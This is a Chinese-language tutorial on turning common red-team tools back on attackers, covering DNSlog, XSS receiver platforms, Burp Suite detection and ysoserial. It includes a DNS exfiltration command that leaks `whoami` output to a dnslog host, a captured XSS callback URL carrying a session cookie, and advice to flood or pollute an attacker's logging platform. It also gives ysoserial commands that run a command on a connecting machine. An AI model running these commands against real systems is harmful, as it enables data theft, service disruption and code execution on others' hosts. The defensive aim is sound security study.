常见攻击方法反制
一、dnslog
1.1、DNSlong原理
DNS在解析的时候会留下日志,这类工具就是读取多级域名的解析日志,来获取信息,简单来说就是把信息放在多级子域名中,传递到我们自己的服务器中,然后读取日志,获取特定信息,最后根据获取的信息来判断我们渗透测试的动作是否成功运行。在一些无回显的漏洞利用中,DNSlog被广泛使用。
常见的DNSLOG平台:
1.2、dnslog红队应用场景
DNS外带
ping `whoami`.8o5x9p.dnslog.cn |
1.3、dnslog反制
针对dnslog和httplog 的反制,获取到对方的payload 的url ,然后批量使用站长之家进行批量ping 或者使用腾讯云函数进行批量访问,对方列表会满满的都是请求。而且大部分dnslog显示会有上限,会不断覆盖,影响其正常使用。
多地ping:多个地点Ping服务器,网站测速 - 站长工具 (chinaz.com)
平台一般都有限制,一次最多显示10条数据,可以根据这种方式来进行干扰
二、XSS平台
攻击者可以利用XSS漏洞获取管理员的cookie信息,然后使用该cookie信息登陆到系统后台,从而进一步攻破系统。xss平台是一个集成的XSS攻击与控制平台,能够自动生成payload,接收和管理受害者的浏览器回传信息,被红队广泛使用:
2.1、xss在线平台
地址:
https://github.com/trysec/BlueLotus_XSSReceiver
docker搭建(需要拥有公网Linux服务器):
https://github.com/Hack3rHan/XSSReceiver-Docker
- 攻击xss漏洞
- 管理受害者信息
2.2、提取攻击信息
通过F12网络发现xss请求http://158.247.240.30:18081/myjs/xss.js
varwebsite="http://158.247.240.30:18081"; |
获取拼接url
http://158.247.240.30:18081/?keepsession=1&location=http%3A//158.247.240.30%3A10006/vulnerabilities/xss_s/&toplocation=http%3A//158.247.240.30%3A10006/vulnerabilities/xss_s/&cookie=PHPSESSID%3D3floq093lgmdffej55q0cmmb03%3B%20security%3Dlow&opener= |
2.3、反制Xss平台
不停的发送请求或发起污染请求
http://158.247.240.30:18081/?keepsession=1&location=http://fukkyooou&toplocation=fukkyooou&cookie=gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg&opener= |
三、burpsuite
3.1、burpsuite应用场景
burpsuite 是一个
渗透测试
中必备的抓包工具,几乎每个做渗透的都会用这个软件。对于一个网站来说,网站的访问者如果挂了 burpsuite 的代理来访问网站,那多半是不怀好意的。如果能识别出来访问者使用了 burpsuite 那就可以直接丢进蜜罐。burpsuite 的代理是可以访问到
http://burp/
这个地址的
3.2、检测burpsuite
将这个html代码放到服务器或者或者kali中,然后打开web服务
<script src="http://burp/jquery.js"onload="alert('found burp')"></script> |
访问这个页面会触发弹窗,前提是浏览器使用burp的情况下。
- 此页面放至KALI或公网云服务器,并开启监听python3 -m http.server 9999
|
四、ysoserial
4.1、ysoserial应用场景
https://github.com/frohoff/ysoserial
java反序列化利用工具(几乎人人必备,其他java反序列化工具,如jndiExploit、fastjsonExploit等基本都是基于ysoserial),此工具必须java8或java11才能运行,kali上自带的java17无法满足其运行条件。
4.2、ysoserial反制
ysoserial本身并不会攻击漏洞,而是提供攻击漏洞的弹药库(反序列化利用链),而正如弹药库本身会存在安全隐患一样,ysoserial本身会存在反序列化漏洞(这一点是几乎无法避免的,其他类似工具也是如此)
- 蓝队视角(准备钓鱼红队)
java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "calc.exe" |
红队视角
java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 1099 CommonsCollections6 whoami
红队看到蓝队端口打开,想尝试着执行命令whoami,查看蓝队信息,结果反被弹出计算器